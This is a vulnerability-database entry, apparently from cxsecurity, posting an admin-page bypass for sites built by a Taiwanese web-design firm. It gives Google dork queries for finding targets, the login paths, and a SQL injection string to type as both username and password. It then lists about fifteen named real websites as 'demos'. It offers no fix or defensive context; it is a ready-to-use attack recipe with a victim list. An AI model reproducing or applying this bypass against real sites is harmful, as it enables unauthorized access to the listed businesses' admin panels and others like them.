網站建置 by 創意細胞 Admin Page Bypass

2016.01.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------In The Name Of God------------------------| |[+] Exploit Title: 網站建置 by 創意細胞 Admin Page Bypass |[+] Exploit Author: Ashiyane Digital Security Team |[+] Vendor Homepage: http://www.mydesigncell.com/ |[+] Google Dork 1: intext:"網站建置 by 創意細胞" |[+] Google Dork 2: intext:"名留集團" |[+] Tested on: Windows 10 && Google Chrome && Mozilla Firefox |[+] Date: 2016 01 10 |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Then Choose a Target and put this after URL 1 : /system/login.php |[+] Then Choose a Target and put this after URL 2 : /backend/login.php |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] And fill username and password like the information below : |[+] Username : '=''or' |[+] Password : '=''or' |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Demos : |[+] http://www.ps-hair.com.tw/system/login.php |[+] http://www.vigorbeautyspa.com.tw/system/login.php |[+] http://www.vigorbeauty.com/system/login.php |[+] http://www.mydoctor.net.tw/system/login.php |[+] http://www.ml-hair.com.tw/system/index.php |[+] http://www.4flower.com.tw/backend/login.php |[+] http://www.jeancare.com.tw/system/login.php |[+] http://www.at-hair.com.tw/system/login.php |[+] http://www.up-hair.com.tw/system/login.php |[+] http://www.renova.com.tw/backend/login.php |[+] http://www.holove.com.tw//backend/login.php |[+] http://www.mlgroup.com.tw/system/login.php |[+] http://sun.vigorbeauty.com/system/login.php |[+] http://gogorentcar.creatcell.net/system/login.php |[+] http://www.kingfuh.tw/system/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : modiret |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2026, cxsecurity.com

 

Back to Top